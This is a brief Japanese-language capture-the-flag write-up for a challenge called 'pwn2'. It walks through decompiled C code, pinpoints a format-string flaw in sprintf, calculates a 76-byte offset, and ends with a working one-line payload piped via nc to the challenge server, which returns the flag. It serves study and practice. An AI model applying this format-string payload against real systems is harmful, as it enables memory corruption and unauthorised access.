pwn2
analyze the binary and exploit server at: nc 35.231.63.121 1339
$ file pwn02 pwn02: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0cb9b2966c95284d3ca08d3ef9a04fd3ceb844ae, not stripped
まずはmain()から見ていく。
int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [rsp+9h] [rbp-7h] puts("enter something"); fflush(_bss_start); fgets(&s, 7, stdin); func(&s); return 0; }
func()
int __fastcall func(const char *a1) { char s; // [rsp+10h] [rbp-50h] int v3; // [rsp+5Ch] [rbp-4h] v3 = 0; sprintf(&s, a1); if ( v3 != 49153 ) return puts("not good!!"); puts("congrats :-)"); return print_flag(); }
sprintf(&s, a1);の脆弱性を使ってv3を 49153(0xc001)に上書きする。
stack of func()
-0000000000000058 format dq ? ; offset -0000000000000050 s db ? (snip) -0000000000000004 v3 dd ? +0000000000000000 s db 8 dup(?) +0000000000000008 r db 8 dup(?)
sからv3を上書きするオフセットは0x50-0x4=76
~/Desktop/CBMCTF/Pwn/pwn2 ? python -c "print '%76x\x01\xc0\x00\x00'" | nc 35.231.63.121 1339 enter something congrats :-) cbmctf{f0rm@t_5tr!n6s!!}